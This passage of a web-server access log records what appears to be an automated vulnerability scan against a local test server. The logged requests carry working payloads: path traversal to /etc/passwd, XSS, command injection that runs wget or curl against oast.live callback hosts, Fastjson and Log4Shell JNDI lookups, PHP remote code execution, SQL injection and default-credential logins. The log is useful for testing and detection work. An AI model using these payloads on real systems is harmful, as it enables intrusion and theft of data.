+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/32 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login.php?user=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebInterface/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://ca28fg0smpvbd3qg07h09t9etbug8onej.oast.live`;busybox wget http://ca28fg0smpvbd3qg07h0f5u91zrhj4rpt.oast.live&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crowd/console/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Sitefinity/Authenticate/SWT HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.127.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws2020/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/33 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-laravel HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/QueryComponent!Default.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"{\x0D\x0A \x22b\x22:{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca28fg0smpvbd3qg07h0oazp3sqhiq6tu.oast.live/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensso/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22Lcom.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca28fg0smpvbd3qg07h0pwwaiu51dc358.oast.live/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/dam/merge/metadata.html?path=/etc&.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://ca28fg0smpvbd3qg07h0gjqjdgg9takin.oast.live`;wget http://ca28fg0smpvbd3qg07h01nttg7htaca6a.oast.live&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /updating.jsp?url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/custom.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=command&command=set_city_timezone&value=$(wget%20http://ca28fg0smpvbd3qg07h05gr9t6rnw717w.oast.live)) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /IntellectMain.jsp?IntellectSystem=https://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws2021/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sphinx-graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/34 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca28fg0smpvbd3qg07h0n6aiwjrzf8q5q.oast.live/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"csrf_token={{csrf_token}}&username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/admin/airflow/login", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax/networking/get_netcfg.php?iface=;curl%20http://ca28fg0smpvbd3qg07h0seoke8h8scskm.oast.live/`whoami`; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Orion/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kb_view_customer.do?sysparm_article=KB00xxxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"{\x22username\x22:\x22${jndi:ldap://${hostName}.ca28fg0smpvbd3qg07h0me9mr1wo4k9h8.oast.live}\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /suite-api/api/auth/token/acquire HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/ui/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_pvt/service.pwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/pkg?command= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\x22%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa 